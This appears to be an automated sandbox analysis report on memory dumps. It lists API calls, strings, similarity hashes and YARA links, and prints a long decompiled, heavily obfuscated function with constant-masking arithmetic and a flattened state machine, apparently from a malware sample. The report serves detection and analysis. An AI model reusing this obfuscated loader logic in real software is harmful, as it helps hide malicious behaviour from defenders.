Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: !HR$#^$%&$1mM#$1t$D3wL$HG\$I_y$KB7$R/$X$YL9$cT;$dGK$g"$r`$uXB$| $H]9$W)$8
API String ID: 0-1856653443
Opcode ID: ad8539ae5d41161d340a196bf3420a1cfd4c9a907a9a1ebd7939a2be102b0fa3
Instruction ID: d9afc8961f0d0974a599edc3d78d413688fff3a281f3a8394123bbb07a7225db
Opcode Fuzzy Hash: ad8539ae5d41161d340a196bf3420a1cfd4c9a907a9a1ebd7939a2be102b0fa3
Instruction Fuzzy Hash: 7CD202715093818BD378CF29C58ABCBBBE1BB95308F10891EE6D996260D7B09949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C1CD0, Relevance: 26.7, APIs: 12, Strings: 3, Instructions: 462COMMON

Download Yara Rule

APIs

PdhCollectQueryData.PDH(?,49F8414E,?,?,?,?,6E4E9DAB,000000FF), ref: 6E4C1D77
PdhGetFormattedCounterValue.PDH(?,00000200,00000000,?,?,?,6E4E9DAB,000000FF), ref: 6E4C1DE1
GetTextMetricsW.GDI32(?,?,00000010,?), ref: 6E4C1F40
GetClientRect.USER32 ref: 6E4C224B
GetDeviceCaps.GDI32(?,0000005A), ref: 6E4C22C0
MulDiv.KERNEL32(?,00000000,00000048), ref: 6E4C22D5
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 6E4C22FA
SetTextColor.GDI32(?,?), ref: 6E4C2312
SelectObject.GDI32(?,00000000), ref: 6E4C231A
DrawTextW.USER32(?,?,?,?,00000000), ref: 6E4C2356
SelectObject.GDI32(?,00000000), ref: 6E4C2363
DeleteObject.GDI32(00000000), ref: 6E4C236A

Strings

[N/A], xrefs: 6E4C2117
%s%d.%d%s, xrefs: 6E4C2198
%s%s%s, xrefs: 6E4C21F2

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectText$Select$CapsClientCollectColorCounterCreateDataDeleteDeviceDrawFontFormattedMetricsQueryRectValue
String ID: %s%d.%d%s$%s%s%s$[N/A]
API String ID: 4229994797-711029782
Opcode ID: 6b9bcdb35f9a47bd6ea5c876dddc241976a1e4cf6aceaef9b15fa6861bf21e8e
Instruction ID: 42810302447f8fdbeaf955723daa0e2b4bab108018f8cb589fbbc84dde0b12b1
Opcode Fuzzy Hash: 6b9bcdb35f9a47bd6ea5c876dddc241976a1e4cf6aceaef9b15fa6861bf21e8e
Instruction Fuzzy Hash: F8128B759006299FCB64CF68CC80ADAB7B9FF49704F0442DAE509A7261DB70AEC5CF91

Uniqueness

Uniqueness Score: -1.00%

Function 013EAC95, Relevance: 23.2, Strings: 18, Instructions: 685
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E013EAC95(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, signed int _a28, signed int* _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, signed int _a48) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _t800;
				signed int* _t818;
				signed int _t819;
				signed int _t822;
				void* _t829;
				signed int _t830;
				signed int _t832;
				signed int _t833;
				signed int _t834;
				signed int _t835;
				signed int _t836;
				signed int _t837;
				signed int _t838;
				signed int _t839;
				signed int _t840;
				signed int _t841;
				void* _t842;
				signed int _t843;
				signed int _t858;
				void* _t897;
				signed int _t913;
				signed int _t914;
				signed int _t915;
				signed int _t918;
				signed int* _t924;
				void* _t928;

				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28 & 0x0000ffff);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E01402523(_a28 & 0x0000ffff);
				_v300 = 0xd1cc29;
				_t924 =  &(( &_v308)[0xe]);
				_v300 = _v300 ^ 0xaa9b9a42;
				_v300 = _v300 ^ 0xaa4a566b;
				_v120 = 0xd766cb;
				_t830 = 0;
				_v120 = _v120 >> 5;
				_t915 = 0x3196c07;
				_v120 = _v120 + 0xffffc2b8;
				_v120 = _v120 ^ 0x00067dfd;
				_v232 = 0x851d10;
				_v232 = _v232 >> 4;
				_v232 = _v232 | 0x68ff3af1;
				_v232 = _v232 + 0xa41e;
				_v232 = _v232 ^ 0x690020c7;
				_v64 = 0x5b203f;
				_v64 = _v64 >> 0xb;
				_v64 = _v64 ^ 0x00008b64;
				_v164 = 0x63d511;
				_v164 = _v164 + 0xffffee15;
				_v8 = 0;
				_t913 = 0x4f;
				_v164 = _v164 / _t913;
				_v164 = _v164 ^ 0x00010347;
				_v140 = 0x5208f;
				_v140 = _v140 + 0xffff4186;
				_v140 = _v140 | 0xcae24784;
				_v140 = _v140 ^ 0xcaa66795;
				_v12 = 0xcd4b66;
				_v12 = _v12 + 0xffffb2fc;
				_v12 = _v12 ^ 0x00c8fe62;
				_v172 = 0x1431ee;
				_v172 = _v172 ^ 0xe76300a3;
				_v172 = _v172 >> 9;
				_v172 = _v172 ^ 0x0473bb98;
				_v72 = 0x2a024b;
				_v72 = _v72 + 0xc1b7;
				_v72 = _v72 ^ 0x0022c402;
				_v116 = 0x1a249a;
				_v116 = _v116 | 0x94501829;
				_v116 = _v116 << 0xe;
				_v116 = _v116 ^ 0x8f2ec200;
				_v292 = 0x42fdbe;
				_v292 = _v292 + 0x9503;
				_v292 = _v292 + 0xffff48ca;
				_v292 = _v292 >> 2;
				_v292 = _v292 ^ 0x0010b7e2;
				_v40 = 0x1c76ed;
				_v40 = _v40 << 0xd;
				_v40 = _v40 ^ 0x0edda000;
				_v204 = 0xdf72f6;
				_v204 = _v204 ^ 0x99836ccc;
				_v204 = _v204 >> 6;
				_v204 = _v204 ^ 0x02657078;
				_v256 = 0x7f2be8;
				_v256 = _v256 + 0x8074;
				_v256 = _v256 << 0xb;
				_v256 = _v256 + 0xf869;
				_v256 = _v256 ^ 0xfd63d828;
				_v84 = 0x77dab9;
				_v84 = _v84 | 0x79e4a371;
				_v84 = _v84 ^ 0x79f7fbe6;
				_v68 = 0xc3d915;
				_v68 = _v68 | 0x94a8eb56;
				_v68 = _v68 ^ 0x94ebfb48;
				_v132 = 0x2f5086;
				_v132 = _v132 + 0xffffb583;
				_v132 = _v132 << 6;
				_v132 = _v132 ^ 0x0bc18243;
				_v76 = 0x1fabb3;
				_v76 = _v76 ^ 0x5273c57e;
				_v76 = _v76 ^ 0x526c6fcd;
				_v300 = 0x8e8c49;
				_v300 = _v300 << 0xf;
				_v300 = _v300 ^ 0x46278df7;
				_v300 = 0x8ee475;
				_v300 = _v300 << 1;
				_v300 = _v300 ^ 0x011c9f5b;
				_v304 = 0x7259a2;
				_v304 = _v304 | 0x64804cb6;
				_v304 = _v304 + 0xffffd1cb;
				_v304 = _v304 ^ 0x64f1a62d;
				_v308 = 0x85033;
				_v308 = _v308 >> 1;
				_v308 = _v308 >> 4;
				_v308 = _v308 ^ 0x6790e852;
				_v308 = _v308 ^ 0x67933f0e;
				_v304 = 0xb400a4;
				_v304 = _v304 * 0x5f;
				_v304 = _v304 >> 1;
				_v304 = _v304 ^ 0x21614ee0;
				_v300 = 0x4fe69a;
				_v300 = _v300 << 0xa;
				_v300 = _v300 ^ 0x3f941466;
				_v308 = 0xceb94b;
				_v308 = _v308 ^ 0x8a35815d;
				_v308 = _v308 << 2;
				_v308 = _v308 + 0xffff3b89;
				_v308 = _v308 ^ 0x2be914c6;
				_v308 = 0x72b949;
				_v308 = _v308 * 0x5f;
				_v308 = _v308 + 0x856b;
				_v308 = _v308 >> 4;
				_v308 = _v308 ^ 0x02aa6435;
				_v308 = 0x3855ef;
				_v308 = _v308 ^ 0xc26dcfeb;
				_v308 = _v308 >> 9;
				_v308 = _v308 + 0xf615;
				_v308 = _v308 ^ 0x006d0aa6;
				_v304 = 0xf05db3;
				_v304 = _v304 ^ 0xdd1eaeb3;
				_v304 = _v304 | 0xcd57129b;
				_v304 = _v304 ^ 0xddf9e192;
				_v304 = 0xe5d59f;
				_v304 = _v304 >> 3;
				_v304 = _v304 | 0xd82d12eb;
				_v304 = _v304 ^ 0xd830880e;
				_v308 = 0xf96c58;
				_v308 = _v308 ^ 0xcd497794;
				_v308 = _v308 >> 8;
				_v308 = _v308 << 0xe;
				_v308 = _v308 ^ 0x6c0878ec;
				_v112 = 0x549d76;
				_v112 = _v112 | 0xd7795fbc;
				_v112 = _v112 ^ 0x87f0a508;
				_v112 = _v112 ^ 0x50826402;
				_v216 = 0x3f0678;
				_v216 = _v216 + 0x24e9;
				_v216 = _v216 | 0xe5268454;
				_v216 = _v216 >> 4;
				_v216 = _v216 ^ 0x0e538ef0;
				_v224 = 0x2c235d;
				_t239 =  &_v224; // 0x2c235d
				_t832 = 0x54;
				_v224 =  *_t239 / _t832;
				_v224 = _v224 + 0x4b47;
				_v224 = _v224 ^ 0xdeaa23a4;
				_v224 = _v224 ^ 0xdea66806;
				_v108 = 0x63b50d;
				_t833 = 0x75;
				_v108 = _v108 * 0x45;
				_v108 = _v108 ^ 0x1ada951f;
				_v128 = 0x429af;
				_v128 = _v128 / _t833;
				_v128 = _v128 + 0xffff20f8;
				_v128 = _v128 ^ 0xfff26b7c;
				_v16 = 0xcf37d;
				_v16 = _v16 ^ 0xf47dc5d0;
				_v16 = _v16 ^ 0xf47387c1;
				_v196 = 0x7ce77a;
				_v196 = _v196 << 3;
				_v196 = _v196 >> 9;
				_v196 = _v196 ^ 0x00028fc4;
				_v156 = 0x3f887d;
				_v156 = _v156 | 0xf44bd7f3;
				_v156 = _v156 + 0xffff0258;
				_v156 = _v156 ^ 0xf47739ea;
				_v188 = 0x63e935;
				_v188 = _v188 >> 8;
				_v188 = _v188 + 0xffff2425;
				_v188 = _v188 ^ 0xfff73234;
				_v24 = 0x175bba;
				_v24 = _v24 + 0xffffef28;
				_v24 = _v24 ^ 0x00116fa0;
				_v228 = 0x14bf2b;
				_v228 = _v228 ^ 0x9f98aa1b;
				_v228 = _v228 ^ 0xb7a6a3cc;
				_v228 = _v228 ^ 0xda4e4d24;
				_v228 = _v228 ^ 0xf26fd88a;
				_v268 = 0x9ceccb;
				_v268 = _v268 << 0xa;
				_v268 = _v268 + 0xffff08d0;
				_v268 = _v268 * 0x72;
				_v268 = _v268 ^ 0x8554b22a;
				_v88 = 0x5dbfb9;
				_v88 = _v88 >> 1;
				_v88 = _v88 ^ 0x00272228;
				_v244 = 0xfbde6e;
				_v244 = _v244 + 0x5af4;
				_v244 = _v244 + 0xffff3210;
				_v244 = _v244 << 6;
				_v244 = _v244 ^ 0x3ed0ab12;
				_v180 = 0x963ad7;
				_v180 = _v180 ^ 0x7886baab;
				_v180 = _v180 + 0xffff09c9;
				_v180 = _v180 ^ 0x780d68b8;
				_v80 = 0x9e10b0;
				_v80 = _v80 | 0xae2b0e0b;
				_v80 = _v80 ^ 0xaeb5bcb2;
				_v148 = 0x7be7e6;
				_v148 = _v148 << 8;
				_v148 = _v148 | 0x0142ad06;
				_v148 = _v148 ^ 0x7be85494;
				_v280 = 0x367665;
				_v280 = _v280 | 0xfffff67f;
				_v280 = _v280 ^ 0xfff2e53f;
				_v212 = 0xf72381;
				_v212 = _v212 + 0xffff2e4f;
				_v212 = _v212 + 0xffff7b98;
				_v212 = _v212 ^ 0x00f0d936;
				_v208 = 0x723ec;
				_v208 = _v208 | 0xe2e26793;
				_v208 = _v208 * 0x65;
				_v208 = _v208 ^ 0x8545d83d;
				_v124 = 0x1deff5;
				_v124 = _v124 + 0xffffaa6b;
				_v124 = _v124 | 0x9135d2e0;
				_v124 = _v124 ^ 0x91314ff1;
				_v288 = 0x86787e;
				_v288 = _v288 << 3;
				_v288 = _v288 ^ 0x319a621a;
				_t834 = 0x4c;
				_v288 = _v288 / _t834;
				_v288 = _v288 ^ 0x00b47538;
				_v252 = 0x89e0e5;
				_t835 = 0x2c;
				_v252 = _v252 * 0x4f;
				_v252 = _v252 >> 0xd;
				_v252 = _v252 ^ 0x178b4366;
				_v252 = _v252 ^ 0x1787f403;
				_v32 = 0xfdee53;
				_v32 = _v32 ^ 0x2185366e;
				_v32 = _v32 ^ 0x2170250f;
				_v236 = 0x55fc8a;
				_v236 = _v236 + 0x15cc;
				_v236 = _v236 * 0x54;
				_v236 = _v236 * 0x6d;
				_v236 = _v236 ^ 0x066e90b6;
				_v104 = 0xfda392;
				_v104 = _v104 ^ 0x79c4e352;
				_v104 = _v104 ^ 0x793a8fcb;
				_v56 = 0xc91cce;
				_v56 = _v56 + 0xfffff402;
				_v56 = _v56 ^ 0x00c263ba;
				_v272 = 0x5a59b6;
				_v272 = _v272 + 0xffffb917;
				_v272 = _v272 * 0x69;
				_v272 = _v272 << 2;
				_v272 = _v272 ^ 0x93c354db;
				_v184 = 0x8fd0ca;
				_v184 = _v184 + 0xffffa535;
				_v184 = _v184 | 0xf05f6e95;
				_v184 = _v184 ^ 0xf0d33a82;
				_v192 = 0xd967c8;
				_v192 = _v192 / _t835;
				_v192 = _v192 | 0x096317b5;
				_v192 = _v192 ^ 0x09603d64;
				_v100 = 0xae60c5;
				_t836 = 0x4b;
				_v100 = _v100 * 0x39;
				_v100 = _v100 ^ 0x26d44587;
				_v264 = 0x13ecdf;
				_v264 = _v264 / _t836;
				_t837 = 7;
				_v264 = _v264 * 0xa;
				_v264 = _v264 + 0xffff2839;
				_v264 = _v264 ^ 0x000caae0;
				_v168 = 0xe37d7f;
				_v168 = _v168 / _t837;
				_v168 = _v168 | 0x3074f611;
				_v168 = _v168 ^ 0x307de6eb;
				_v92 = 0xe11ed;
				_v92 = _v92 >> 0xb;
				_v92 = _v92 ^ 0x0001b24f;
				_v176 = 0x3811fc;
				_v176 = _v176 + 0x9eb8;
				_v176 = _v176 + 0xffffeb15;
				_v176 = _v176 ^ 0x0034f958;
				_v152 = 0x751569;
				_v152 = _v152 ^ 0xf1367d03;
				_t838 = 0x2a;
				_v152 = _v152 / _t838;
				_v152 = _v152 ^ 0x05b938f5;
				_v160 = 0x826d3e;
				_v160 = _v160 + 0xffff0d45;
				_v160 = _v160 << 9;
				_v160 = _v160 ^ 0x02f1c982;
				_v308 = 0x615de7;
				_t508 =  &_v308; // 0x615de7
				_t839 = 0x32;
				_v308 =  *_t508 * 0x5b;
				_v308 = _v308 + 0xffff0e3a;
				_v308 = _v308 >> 0xc;
				_v308 = _v308 ^ 0x000176ef;
				_v248 = 0x940bff;
				_v248 = _v248 / _t839;
				_v248 = _v248 | 0xf3f710e4;
				_v248 = _v248 / _t839;
				_v248 = _v248 ^ 0x04ec6dcd;
				_v48 = 0xcfc725;
				_v48 = _v48 >> 0xf;
				_v48 = _v48 ^ 0x00010a74;
				_v96 = 0x365da7;
				_v96 = _v96 >> 6;
				_v96 = _v96 ^ 0x0002081b;
				_v276 = 0x225d96;
				_v276 = _v276 + 0x2c1;
				_v276 = _v276 / _t913;
				_v276 = _v276 << 6;
				_v276 = _v276 ^ 0x001c07fc;
				_v220 = 0x39c1d0;
				_v220 = _v220 ^ 0x8168a0f4;
				_v220 = _v220 << 3;
				_v220 = _v220 << 0xc;
				_v220 = _v220 ^ 0xb09df3c0;
				_v284 = 0xf9c0bb;
				_v284 = _v284 >> 0xe;
				_v284 = _v284 + 0x14c0;
				_v284 = _v284 << 7;
				_v284 = _v284 ^ 0x000b4193;
				_v20 = 0xc3fb9a;
				_v20 = _v20 + 0x8d16;
				_v20 = _v20 ^ 0x00ccf36e;
				_v240 = 0x8c9adc;
				_v240 = _v240 ^ 0x888f7960;
				_v240 = _v240 + 0xffff62bf;
				_v240 = _v240 + 0xffff86c4;
				_v240 = _v240 ^ 0x880c37e1;
				_v200 = 0xd9fcf3;
				_v200 = _v200 << 4;
				_v200 = _v200 ^ 0xd6e38aec;
				_v200 = _v200 ^ 0xdb711a2e;
				_v260 = 0x11f115;
				_t840 = 0x53;
				_v260 = _v260 / _t840;
				_v260 = _v260 >> 8;
				_v260 = _v260 ^ 0xde7704a7;
				_v260 = _v260 ^ 0xde7b5856;
				_v304 = 0x1851cb;
				_v304 = _v304 ^ 0x0d0756f7;
				_v304 = _v304 + 0x1e91;
				_v304 = _v304 ^ 0x0d150a0a;
				_v136 = 0xc7edb3;
				_v136 = _v136 + 0xffff3700;
				_v136 = _v136 + 0x6375;
				_v136 = _v136 ^ 0x00cba417;
				_v52 = 0x62e7e0;
				_t623 =  &_v52; // 0x62e7e0
				_t841 = 0x23;
				_v52 =  *_t623 / _t841;
				_v52 = _v52 ^ 0x0001b1ca;
				_v144 = 0x12c825;
				_v144 = _v144 >> 0xb;
				_v144 = _v144 << 1;
				_v144 = _v144 ^ 0x0001096e;
				_v300 = 0xe8ad08;
				_v300 = _v300 + 0xffffda27;
				_v300 = _v300 ^ 0x00e4ab5e;
				_v28 = 0x3c1d14;
				_v28 = _v28 | 0xc4f139e0;
				_v28 = _v28 ^ 0xc4f03139;
				_v36 = 0x5a3c12;
				_v36 = _v36 * 0x5f;
				_v36 = _v36 ^ 0x21715166;
				_v44 = 0x139fe3;
				_v44 = _v44 | 0xc7ef95d4;
				_v44 = _v44 ^ 0xc7f6afb5;
				_t914 = _v4;
				_t922 = _v4;
				while(1) {
					L1:
					_t800 = _v296;
					_t842 = 0xd648990;
					while(1) {
						L2:
						_t897 = 0xffd9902;
						while(1) {
							L3:
							_t928 = _t915 - 0xb64b6f6;
							if(_t928 > 0) {
								goto L19;
							}
							L4:
							if(_t928 == 0) {
								_t818 = _a32;
								_t843 =  *_t818;
								__eflags = _t843;
								if(_t843 == 0) {
									_t819 = 0;
									__eflags = 0;
								} else {
									_t819 = _t818[1];
								}
								E013EA2F6(_t914, _t819, _v48, _v96, _v276, _a44, _t843, _v220, _v284);
								_t924 =  &(_t924[8]);
								asm("sbb esi, esi");
								_t915 = (_t915 & 0x0876ac85) + 0x337366e;
								while(1) {
									L1:
									_t800 = _v296;
									_t842 = 0xd648990;
									goto L2;
								}
							} else {
								if(_t915 == 0x7d36d3) {
									_push(_v128);
									_push(_v204);
									_push(_v108);
									_push(_v224);
									_t822 = E013EF2CC(_v216);
									_t922 = _t822;
									__eflags = _t822;
									_t915 =  !=  ? 0xffd9902 : 0x2d9c50f;
									E013E2043(0, _v16, _v196, _v156);
									_t924 = _t924 - 0x10 + 0x28;
									_t842 = 0xd648990;
									_t897 = 0xffd9902;
									goto L37;
								} else {
									if(_t915 == 0x1dc854f) {
										E013E54DA(_v300, _v28, _v36, _v44, _t922);
									} else {
										if(_t915 == 0x3196c07) {
											_t915 = 0xb6d7c5f;
											continue;
										} else {
											if(_t915 == 0x337366e) {
												E013E54DA(_v20, _v240, _v200, _v260, _t914);
												_t924 =  &(_t924[3]);
												L12:
												_t915 = 0xbb8862e;
												while(1) {
													L1:
													_t800 = _v296;
													_t842 = 0xd648990;
													goto L2;
												}
											} else {
												if(_t915 != 0x8f009c2) {
													L37:
													__eflags = _t915 - 0x2d9c50f;
													if(_t915 != 0x2d9c50f) {
														_t800 = _v296;
														continue;
													}
												} else {
													E013FF83F(_t914, _a16);
													_t915 = 0x337366e;
													_t829 = 1;
													_t830 =  !=  ? _t829 : _t830;
													while(1) {
														L1:
														_t800 = _v296;
														_t842 = 0xd648990;
														L2:
														_t897 = 0xffd9902;
														while(1) {
															L3:
															_t928 = _t915 - 0xb64b6f6;
															if(_t928 > 0) {
																goto L19;
															}
															goto L4;
														}
														goto L19;
													}
												}
											}
										}
									}
								}
							}
							L40:
							return _t830;
							L41:
							L19:
							__eflags = _t915 - 0xb6d7c5f;
							if(_t915 == 0xb6d7c5f) {
								_t915 = 0x7d36d3;
								goto L37;
							} else {
								__eflags = _t915 - 0xbade2f3;
								if(__eflags == 0) {
									__eflags = E013FBC05(_t914, _v120, __eflags) - _v232;
									_t915 =  ==  ? 0x8f009c2 : 0x337366e;
									goto L1;
								} else {
									__eflags = _t915 - 0xbb8862e;
									if(_t915 == 0xbb8862e) {
										E013E54DA(_v304, _v136, _v52, _v144, _t800);
										_t924 =  &(_t924[3]);
										_t915 = 0x1dc854f;
										while(1) {
											L1:
											_t800 = _v296;
											_t842 = 0xd648990;
											goto L2;
										}
									} else {
										__eflags = _t915 - _t842;
										if(_t915 == _t842) {
											__eflags =  *_a32;
											if(__eflags == 0) {
												_t806 = _v8;
											} else {
												_push(_v148);
												_push(0x13e1608);
												_v8 = E013E3F5C(_v180, _v80, __eflags);
											}
											_t858 = _v40 | _v292 | _v116 | _v72 | _v172 | _v12 | _v140 | _v164 | _v64;
											_t918 = _a48 & 1;
											__eflags = _t918;
											if(_t918 != 0) {
												__eflags = _t858;
											}
											_t914 = E013E8A5E(_v280, _v296, _v212, _v208, _v124, _v288, _t858, _t858, _t858, _t858, _t806, _t858, _v252, _v32, _v236, _a4);
											E01400352(_v104, _v56, _v8, _v272);
											_t924 =  &(_t924[0x10]);
											__eflags = _t914;
											if(_t914 == 0) {
												goto L12;
											} else {
												_v60 = 1;
												E013E53F7( &_v60, _v256, _v184, 4, _v192, _t914, _v100, _v264);
												_t924 =  &(_t924[6]);
												__eflags = _t918;
												if(_t918 != 0) {
													E013E40B0(_v84, _t914, _v168, _v92,  &_v60, _v176,  &_v4);
													_t739 =  &_v60;
													 *_t739 = _v60 | _v76;
													__eflags =  *_t739;
													E013E53F7( &_v60, _v68, _v152, _v4, _v160, _t914, _v308, _v248);
													_t924 =  &(_t924[0xb]);
												}
												_t915 = 0xb64b6f6;
												while(1) {
													L1:
													_t800 = _v296;
													_t842 = 0xd648990;
													goto L2;
												}
											}
											goto L41;
										} else {
											__eflags = _t915 - _t897;
											if(_t915 != _t897) {
												goto L37;
											} else {
												_t800 = E014030FB(_a40, _v188, _v24, _v132, _v228, _t922, _t842, _v268, _v88, _a28, _t842, _v244);
												_t924 =  &(_t924[0xc]);
												_v296 = _t800;
												__eflags = _t800;
												_t842 = 0xd648990;
												_t915 =  !=  ? 0xd648990 : 0x1dc854f;
												goto L2;
											}
										}
									}
								}
							}
							goto L40;
						}
					}
				}
			}

0x013eaca6
0x013eacb0
0x013eacb7
0x013eacbe
0x013eacc5
0x013eaccc
0x013eaccd
0x013eacd4
0x013eacdb
0x013eace2
0x013eace9
0x013eacf0
0x013eacf7
0x013eacf8
0x013eacf9
0x013eacfe
0x013ead06
0x013ead09
0x013ead13
0x013ead1d
0x013ead28
0x013ead2a
0x013ead32
0x013ead37
0x013ead42
0x013ead4d
0x013ead55
0x013ead5a
0x013ead62
0x013ead6a
0x013ead72
0x013ead7d
0x013ead85
0x013ead90
0x013ead9b
0x013eada6
0x013eadb6
0x013eadb9
0x013eadc0
0x013eadcb
0x013eadd6
0x013eade1
0x013eadec
0x013eadf7
0x013eae02
0x013eae0d
0x013eae18
0x013eae23
0x013eae2e
0x013eae36
0x013eae41
0x013eae4c
0x013eae57
0x013eae62
0x013eae6d
0x013eae78
0x013eae80
0x013eae8b
0x013eae93
0x013eae9b
0x013eaea3
0x013eaea8
0x013eaeb0
0x013eaebb
0x013eaec3
0x013eaece
0x013eaed6
0x013eaede
0x013eaee3
0x013eaeeb
0x013eaef3
0x013eaefb
0x013eaf00
0x013eaf08
0x013eaf10
0x013eaf1b
0x013eaf26
0x013eaf31
0x013eaf3c
0x013eaf47
0x013eaf52
0x013eaf5d
0x013eaf68
0x013eaf70
0x013eaf7b
0x013eaf86
0x013eaf91
0x013eaf9c
0x013eafa4
0x013eafa9
0x013eafb1
0x013eafb9
0x013eafbd
0x013eafc5
0x013eafcd
0x013eafd5
0x013eafdd
0x013eafe5
0x013eafed
0x013eaff1
0x013eaff6
0x013eaffe
0x013eb006
0x013eb013
0x013eb017
0x013eb01b
0x013eb023
0x013eb02b
0x013eb030
0x013eb038
0x013eb040
0x013eb048
0x013eb04d
0x013eb055
0x013eb05d
0x013eb06a
0x013eb06e
0x013eb076
0x013eb07b
0x013eb083
0x013eb08b
0x013eb093
0x013eb098
0x013eb0a0
0x013eb0a8
0x013eb0b0
0x013eb0b8
0x013eb0c0
0x013eb0c8
0x013eb0d0
0x013eb0d5
0x013eb0dd
0x013eb0e5
0x013eb0ed
0x013eb0f5
0x013eb0fa
0x013eb0ff
0x013eb107
0x013eb112
0x013eb11d
0x013eb128
0x013eb133
0x013eb13b
0x013eb143
0x013eb14b
0x013eb150
0x013eb15a
0x013eb162
0x013eb168
0x013eb16d
0x013eb173
0x013eb17b
0x013eb183
0x013eb18b
0x013eb19e
0x013eb19f
0x013eb1a6
0x013eb1b1
0x013eb1c5
0x013eb1cc
0x013eb1d7
0x013eb1e2
0x013eb1ed
0x013eb1f8
0x013eb203
0x013eb20e
0x013eb216
0x013eb21e
0x013eb229
0x013eb234
0x013eb23f
0x013eb24a
0x013eb255
0x013eb260
0x013eb268
0x013eb273
0x013eb27e
0x013eb289
0x013eb294
0x013eb29f
0x013eb2a7
0x013eb2af
0x013eb2b7
0x013eb2bf
0x013eb2c7
0x013eb2cf
0x013eb2d4
0x013eb2e1
0x013eb2e5
0x013eb2ed
0x013eb2f8
0x013eb2ff
0x013eb30a
0x013eb312
0x013eb31a
0x013eb322
0x013eb327
0x013eb32f
0x013eb33a
0x013eb345
0x013eb350
0x013eb35b
0x013eb366
0x013eb371
0x013eb37c
0x013eb387
0x013eb38f
0x013eb39a
0x013eb3a5
0x013eb3ad
0x013eb3b5
0x013eb3bd
0x013eb3c5
0x013eb3cd
0x013eb3d5
0x013eb3dd
0x013eb3e5
0x013eb3f2
0x013eb3f6
0x013eb3fe
0x013eb409
0x013eb416
0x013eb421
0x013eb42c
0x013eb434
0x013eb439
0x013eb447
0x013eb44c
0x013eb452
0x013eb45a
0x013eb467
0x013eb46a
0x013eb46e
0x013eb473
0x013eb47b
0x013eb483
0x013eb48e
0x013eb499
0x013eb4a4
0x013eb4ac
0x013eb4b9
0x013eb4c2
0x013eb4c6
0x013eb4ce
0x013eb4d9
0x013eb4e4
0x013eb4ef
0x013eb4fa
0x013eb505
0x013eb510
0x013eb518
0x013eb525
0x013eb529
0x013eb52e
0x013eb536
0x013eb541
0x013eb54c
0x013eb557
0x013eb562
0x013eb578
0x013eb57f
0x013eb58a
0x013eb595
0x013eb5a8
0x013eb5ab
0x013eb5b2
0x013eb5bd
0x013eb5cd
0x013eb5d6
0x013eb5d7
0x013eb5db
0x013eb5e3
0x013eb5eb
0x013eb5ff
0x013eb606
0x013eb611
0x013eb61c
0x013eb627
0x013eb62f
0x013eb63a
0x013eb647
0x013eb652
0x013eb65d
0x013eb668
0x013eb673
0x013eb687
0x013eb68c
0x013eb693
0x013eb69e
0x013eb6a9
0x013eb6b4
0x013eb6bc
0x013eb6c7
0x013eb6cf
0x013eb6d6
0x013eb6d9
0x013eb6dd
0x013eb6e5
0x013eb6ea
0x013eb6f2
0x013eb702
0x013eb706
0x013eb716
0x013eb71a
0x013eb722
0x013eb72d
0x013eb735
0x013eb740
0x013eb74b
0x013eb753
0x013eb75e
0x013eb766
0x013eb776
0x013eb77a
0x013eb77f
0x013eb787
0x013eb78f
0x013eb797
0x013eb79c
0x013eb7a1
0x013eb7a9
0x013eb7b1
0x013eb7b6
0x013eb7be
0x013eb7c3
0x013eb7cb
0x013eb7d6
0x013eb7e1
0x013eb7ec
0x013eb7f4
0x013eb7fc
0x013eb804
0x013eb80c
0x013eb814
0x013eb81f
0x013eb827
0x013eb832
0x013eb83d
0x013eb849
0x013eb84c
0x013eb850
0x013eb855
0x013eb85d
0x013eb867
0x013eb86f
0x013eb877
0x013eb87f
0x013eb887
0x013eb892
0x013eb89d
0x013eb8a8
0x013eb8b3
0x013eb8be
0x013eb8c7
0x013eb8ca
0x013eb8d1
0x013eb8dc
0x013eb8e7
0x013eb8ef
0x013eb8f6
0x013eb901
0x013eb909
0x013eb911
0x013eb919
0x013eb924
0x013eb92f
0x013eb93a
0x013eb94d
0x013eb954
